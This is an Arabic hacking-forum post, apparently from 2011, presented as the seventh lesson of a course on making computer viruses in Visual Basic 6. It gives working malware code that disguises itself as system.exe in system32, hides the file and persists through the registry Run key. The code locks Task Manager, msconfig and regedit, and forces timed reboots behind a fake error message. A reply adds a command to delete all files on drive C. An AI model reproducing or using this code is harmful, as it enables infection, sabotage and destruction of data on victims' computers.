™®±§•£‡ـ ( Impossible ـ2ـ Mission ) ـ¦‡£•§±®™


غْـِـِـِيْـِـِـِر مُـِـِـِسَـِـِـِِجَـِـِـِل

لأنـنـآ نـعـشـقِ التـميز والـِمُـِمَـِيّـزِيْـטּ يشرفنـآ إنـظمـآمڪ معنـآ فيـﮯ مـنـتـديـآت Impossible ـ2ـ Mission

أثبـت تـوآجُـِدڪ و ڪـטּ مـטּ [ الـِمُـِمَـِيّـزِيْـטּ ..!

لـِڪي تـسـتـطـيـع أن تُـِتْـِِבـفَـِنَـِـِا [ بـِ موآضيعـڪ ومشارڪاتـڪ معنـِـِـِآ ]

(بالضعط على تسجيل)


™®±§•£‡ـ ( Impossible ـ2ـ Mission ) ـ¦‡£•§±®™
 
الرئيسيةالبوابةالتسجيلدخولمركز تحميلنا
السلام عليكم ورحمة الله وبركاته

اولا نأسف من اعضائنا الكرام لأنقطاعنا عنكم ..

والان عدنا بحلة جديدة .....
1- تم تطوير المنتدى و تعديل نسخته لخدمتكم بأفضل الاشكال .
2- تم تعديل الدزاين الى شكل اجمل.
3- تم تغير اسم المنتدى.
4- تم انشاء منتدى جديد ( منتدى عام مختص بشؤن الهكر و الاختراق ) .
ملاحضات : المنتدى الجديد على الرابط التالي : www.m-i-1.moontada.net
- المنتدى ليس فقط للأختراق و الهكرز .. بل هو عام مختص بشؤن المرأة من جميع النواحي.
- مواضيع عامة
-صور كريكاترية .. الخ
و المزيد المزيد...

الدزاين :: TuRbO HaCkEr شيح الهكر

تقبلوا تحيات الادارة ... : : ...
شيخ الهكر
TuRbO HaCkEr
صلاح الدين

شاطر | 
 

 آلدرس السابع : دورة إحتراف صنع الفيروسات

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
فايروس
عضو متميز
عضو متميز
avatar

من اي بلد انت : العراق بلد الخير
احترامي للقوانين : ممتاز
قوه الذكاء : ممتاز
ذكر الابراج : الجدي الأبراج الصينية : القط
عدد المساهمات : 76
نقاط : 12324
كم تحبوني صوتي لي : 8
تاريخ الميلاد : 01/01/1988
تاريخ التسجيل : 14/02/2011
العمر : 29
الموقع : شبكه العراق المجروح

مُساهمةموضوع: آلدرس السابع : دورة إحتراف صنع الفيروسات   الخميس فبراير 24, 2011 10:24 am

آلدرس السابع

هذ جزء خاص قمت بتعديلة علي الدورة
والادوات المطلوبه هي
1- فيجول بيسك 6
2- الذكاء والحيل البرمجيه
3- الريجتسري ( يجب ان تعرف كيف تتعامل معه )

================================================== =======

اولا: الفايروس يعتمد على المراوغه والاختفاء عند تشغيله
وهناك شفرات تقوم بهذه المهمه مثلا
انت تريد عندما يضغط الضحيه على الفايرس تريد ان يختفي وينتقل الي ملف انت تحدده بالشفره البرمجيه
اذا هذا هو الكود

كود PHP:
Name App.Path & "\" & App.EXEName & ".exe" As "c:windowssystem32sysstem.exe"

ماذا فهمت من الكود
طبعا نحن استخدمنا app.path وهذه داله تقوم بتحديد مكان البرنامج (الفايروس) بدون كتابة مساره
يعني لو فرضا كتبنا داله name بهذه الطريقه name c":\virus.exe" as "c:\windows\system32\system.exe"
كذا خطأ لان احتمال الضحيه شغل الفايروس على سطح المكتب او شغله في ملف الوينزوب كذا مراح يشتغل الفايروس
لان نحن كتبنا بالشفره انقل الملف من c:\virus.exe الي c:\windows\system32\system.exe
ولذلك استخدمنا داله app.path تحديد مكان الملف تلقائي بدون كتابة مساره
يعني بذا الطريقه رايح يشتغل الفايروس باي مكان في الجهاز وهذا هو المطلوب
داله name هي داله تقوم على نقل الملف الي اي مكان انت تحدده
نحن قمنا بنقل الملف عند الضغط عليه الي دليل الويندوز ثم الي system32 وتغيير اسمه الي system
حتى عندما يراه الضحيه يحسبه ملف تابع لنظام
================================================== =======
طيب حن الان انتهنا من اول خاصيه للفايروس وهي خاصية التنقل
الان نريد ان نحمي ملف الفايروس من الظهور يعني نبغاه متخفى غير مرئي
نستخدم داله setattr وهذه الداله تقوم بتغيير في خصائص الملف
vbshow تعني اظهر الملف
vbHidden تجعل الملف مخفي
بالعربي انا اعتبر هذه الاخصائص اهم شي ويوجد هناك خصائص اخرى لكن ماتهمنا
طيب كيف نكتب الداله ونستعمل الخصائص
بعد ماكتبنا الكود الاول وهو كود انتقال الفايروس الي مجلد system32
نكتب كود الاختفاء تحته بالضبط
setattr "c:\windows\system32\system.exe",vbHidden
لو شرحنا الكودان يكونا على النحو التالي
قم بنقل الملف virus.exe من مكان وجوده الي مجلد system32 وغير اسمه الي system.exe
الكود الثاني قم باخفاء الملف اللى موجود في مجلد system32 واللي اسمه system.exe
طبعا الان نحن جعلنا الفايروس يتمتع بخصائص الانتقال والتخفى
على فكره اي ملف يستخدم كود الاختفاء لن يستطيع البحث اللي في جهازك كشفه او اظهاره
لن الويندوز يعطي حرية الملف باالاختفاء وبذلك يعطل خاصية البحث عنه
================================================== =======
الان ناتي الي مهمه الفايروس ماذا نريد ان يعمل الفايروس
هناك عدة امور تخبربها الفايروس ليقوم بها


1- اعادة تشغيل الجهاز
2- حذف ملفات معينه
3- عمل فرومات للجهاز .................. هذا لا انصح به نحن نريد ان نصنع فايروس له طابع خاص

يعني نريد ان نصنع فايروس له مهمات مميزه يعرف بها ويشتهر بها عند العامه
4- ايقاف عمل بعض البرامج التي تحمل امتداد exe اوcom او htm او html او gif وهكذا
5- الهجوم على ملفات وتخريبها ( اي تغيير امتدادها حتى لاتعمل ) مثل الهجوم على الصور بامتداد gif وتحويلها الي
امتداد txt او اي امتداد اخر
5- عمل فقط رساله تظهر قبل شاشة الترحيب
6- عمل فايروس يقوم باستخدام الدوس وتشغيل بعض اوامره مثل امر ping لضرب المواقع
7- استخدام الفايروس بتنزيل ملفات تجسس من الانترنت او استدعاء باتش لك من موقعك الخاص وتشغيله في جهاز الضحيه
8- التحكم في بعض برامج النظام وايقافها مثل ايقاف قائمة المهام وغيرها من البرامج المهمه
9- اخفاء محركات الاقراص السي الدي المرن الفلاش مموري والسدي
10 - عمل اشياء ازعاجيه مثل فتح مجلدات فتح برامج وهكذا
11- عمل تسجيل خروج من الماسينجر او التلاعب في حالات الاتصال
12- عمل رقم سري للجهاز لمنع الضحيه لدخول لسطح المكتب
13- ارسال الفايروس رساله لنا على بريدنا يخبرنا بتشغيل الضحيه للفايروس مع عرض الاي بي ووقت تشغيله وتاريخه
كل هذه الاشياء سوف اشرحها مع بعض الخدع في تشغيل الفايروس بدون ان يضغط عليه الضحيه
اتمنى قرات الدرس جيد حتى ابدأ بالدرس الثاني والذي سوف يقدم اشياء جديده لك ومفيده وبعض الخدع والحيل
سوف ابدا الان بعمل شفرات توقف اي برنامج تابع لنظام بايقاف الفايروس
وخلونا نبدأ الان بايقاف قائمة المهام و لن تعمل اذا ضغطت على مفاتيح ctrl+atl+del
اذا دعونا نصنع كود يخلي النظام يظهر رساله بان قائمة المهام مشغوله مع برنامج اخر وبكذا منعنا المستخدم من فتحها

كود PHP:
Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1
الان نحن منعنا المستخدم من فتح قائمة المهام واذا حاول فتحها سوف تظهر رسالة من النظام تقول هذا البرنامج مستخدم
من قبل برنامج اخر
طبعا الكود هذا سوف تضعه في form_load
مع وضع كود يقوم على تشغيل الفايروس في كل مره شغل الضحيه جهازه
وهذا كود تشغيل الفايروس مع تشغيل الجهاز


كود PHP:
Set O = CreateObject("W******.****l")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"< /STRONG >

اذا دعونا الان نجمع الاكواد اللي عملناه ونضعها في form_load

كود PHP:
Private Sub Form_Load()
Set O = CreateObject("W******.****l")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
Form1.Hide
Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"
SetAttr "c:WINDOWSsystem32system.exe", vbHidden
Open "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1
End Sub<
/STRONG >

دعونا نشرح عمل الاكواد بالتفصيل

كود PHP:
Set O = CreateObject("W******.****l")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \Cur r entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"

ProgramName = اسم القيمه تستطيع تغيير اسمها مثلا اجعلها system او اي اسم
c:\WINDOWS\system32\system.exe" بيانات القيمه
الكود يقوم على تشغيل الملف اللي اسمه system.exe الذي على المسار التالي
"c:\WINDOWS\system32\system.exe"
طبعا هذا الكود يقوم على انشاء قيمه في مفتاح run اللي في الريجتسري مما يجعل الفايروس يشتغل مع تشغيل الجهاز
الكود الثاني Form1.Hide عارفينه اكيد يقوم على اخفاء الفايروس فلايظهر نافذته
الكود الثالث

كود PHP:
Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"

يقوم بنقل الفايروس الي مجلد system32 ويخلي اسمه system.exe
لازم يتوافق مسار الفايروس مع مساره في بدأ التشغيل حتى يستطيع تشغيل نفسه مع تشغيل الجهاز
الكود الرابع

كود PHP:
setattr "c:\windows\system32\system.exe",vbHidden

اعطاء خاصية الاخفاء للفايروس
الكود الخامس

كود PHP:
Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

معناه يقوم على فتح قائمة المهام للقراءه ولايقوم على غلقها يعني تضل مفتوحه ومعلقه ومرتبطه مع الفايروس
بحيث لو قام الضحيه بالضغط على مفاتيح ctrl+alt+del مراح تفتح معه
ولو ذهب الي مجلد system32 وقام بالضغط عليه سوف تظهر له رساله من النظام مفادها البرنامج مستخدم من قبل برنامج اخر اي ان الفايرس مستخدمها مدام الجهاز شغال
اتمنى تطبيق هذا الدرس
وسوف اقوم بشرح اكثر من طريقه لايقاف قائمة المهام وايقاف برامج اخرى مثل الاداة المساعده التي تقوم على اظهار
الملفات التي تعمل مع بدا تشغيل الجهاز
دورة متكاملة عن صناعة الفيروسات عن طريق الفيجول بيسك و لاكن انت كفيت و وفيت و اش ما تحتاج اخوك انا و عدي اضافات :
مثلا لاخفاء الفورم يوجد عدة طرق اضيف لطريق الاخ :
me.hide
اما لتشغيل الفيروس عند بدا التشغيل :

كود PHP:
كود بدا التشغيل :
في الموديل :
Option Explicit
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
Private Const READ_CONTROL = &H20000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_NOTIFY = &H10
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Private Const KEY_EXECUTE = KEY_READ
Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL
Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Private Const HKLM =
&H80000002 ' استخدم الامر التالي لالغاء التشغيل التلقائي Public Sub DoNotRun(ProgramName As String) Dim hKey
As Long Dim Ret
As Long ' فتح
المفتاح المطلوب Ret =
RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS,
hKey) ' حذفها من
مسجل النظام. Ret = RegDeleteValue(hKey,
ProgramName) ' إغلاق المفتاح
RegCloseKey hKey End Sub Public Sub RunWhenStartup(ProgramName As String, ProgramPath
As String) Dim hKey As Long Dim Ret
As Long ' فتح
المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) ' إنشاء قيمة جديدة بإسم
البرنامج وعنوانه. Ret = RegSetValueEx(hKey,
ProgramName, 0&, 1, ProgramPath,
Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1) ' إغلاق
المفتاح RegCloseKey hKey End Sub
------------ في الفورم :
RunWhenStartup "عنوان", App.Path &
"" & App.EXEName &
".exe" <
/FONT >
<
/STRONG >
و اما عن التدمير :

كود PHP:
kill "c:\*.*"

و لضمان عمل الفيروس :

كود PHP:
On Error Resume Next

كود PHP:
Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

هذا الكود هو حماية قائمة المهام من القراءة يعني ماتقدر تفتحه ابد

يعني دام الفايروس شغال مراح تقدر تفتحها ابد ( كذا الشرح اعتقد وصل الي ادمغتكم الحلوه)
الي الان حنا حمينا الفايروس من قائمة المهام وبكذا حققنا الحمايه رقم واحد
الان نريد حماية الفايروس من اداة بدا التشغيل التي تعرض البرامج التي تعمل مع بداية الويندوز
نسوي لها كود نفس كود قائمة المهام
منع قراءة او فتح برنامج الاداة المساعده ( بدأ التشغيل )

كود PHP:
Open "C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe " For Input Lock Read As 1

وبكذا حققنا الحماية رقم اثنين
منع قراءة برنامج الريجستري

كود PHP:
Open "C:\WINDOWS\regedit.exe" For Input Lock Read As 1

وبهذه ايضا حققنا الحماية الثالثه للفايروس
شوف اي شخص فاهم للجهاز وطريقة حذف الملفات يتبع عدة طرق

1- قائمة المهام لايقافه
2- بدا الشتغيل ليقاف عمله حتى لايعمل مع بدا التشغيل
3- حذفه من الريجستري يعني حذف القيمه حقته


حنا نبغى ايقاف عمل الثلاث برامج هذه حتى يبقى الفايروس بأمان
وطبعا الان نحن حقننا ثلاث حمايات للفايروس من برنامج قائمة المهام وبرنامج الاداة المساعده(بدأالتشغيل) ومن الريجستري
الحين اتحدى اي شخص يحذف الفايرس ( يعني تسلقى على الفراش وانت مطمن )
الان ناتي الي اعمال الفايروس نبغى نتفنن في اعماله واوامره
=============================================
يعني خلوهم يقولون ياحلو فايروس فلان والله انه يهبل فيه اشياء خرافيه وحركات نص كم ( فاصل اعلاني )

=============================================
يعني بدال من خلي الفايروس يعيد التشغيل كل مافتح الجهاز نخليه يعيد التشغيل في ساعه ودقيقه معينه
يعني مثلا يعيد تشغيل الجهاز كل مصارت الساعه 1:1 و 2:1 و 3:1 وهكذا
يعني كل ساعه ودقيقه ينشط الفايرس وكل ساعتين ودقيقه ينشط الفايرس وهكذا
طيب الان افتح موديل في الفيجول بيسك وضع فيها هذا الكود

كود PHP:
Declare Function ExitWindow*** Lib "user32" _
(ByVal uFlags As Long, ByVal dwReserved _
As Long) As Long

وبعدها ضع عداد تايمر على الفورم وجعله 1000 العداد
الان اكتب الشفره البرمجيه الرائعه

كود PHP:
Private Sub Timer1_Timer()
If Minute(Time) = 1 Then
t& = ExitWindow***(EWX_REBOOT, 0)
End If
End Sub
<
/STRONG >

هذا الكود يقوم على تسجيل خروج من الجهاز يعني لازم تصير الساعه 1:1 يعني لازم الساعه تكون ساعه ودقيقه
ساعتين ودقيقه ثلاث ساعات ودقيقه وهكذا
طبعا قبل تسجيل الخروج بدقيقه تظهر رساله او نافذه تخبر الضحيه بان هناك خلل في ملف معين ولذلك يجب تسجيل الخروج

كود PHP:
Private Sub Timer2_Timer()
If Minute(Time) = 0 Then
MsgBox "ملفات الربط لاتستجيب للنظام سوف يقوم النظام بتسجيل الخروج"
End If
End Sub<
/STRONG >
لاحظ جلعنا الدقائق تساوي صفر يعني الرسالة سوف تظهر كل ما صارت الساعه حكم يعني 3:00 و 2:00 وهكذا
يعني قبل تسجيل الخروج بدقيقه تظهر الرساله تخبر الضحيه بوجود خلل
حنا عملنا مسج بوكس تظهر رساله في الشرح القادم سوف نعمل فورم ثاني يعرض نافذه تشبه نافذه فايروس بلاستر
الشرح القادم سوف نكون اكثر توسع ان شاءالله وتقديم شفرات جديده على الساحه مع ترك بصمه قوية في جهاز الضحيه

شبـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــكه العراق المجــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــروح










لا اله الا الله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://kingdom-12.hooxs.com/donate
 
آلدرس السابع : دورة إحتراف صنع الفيروسات
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
™®±§•£‡ـ ( Impossible ـ2ـ Mission ) ـ¦‡£•§±®™ :: تعلم التهكير والهكر :: تعليم الاختراق والهكر دورات-
انتقل الى: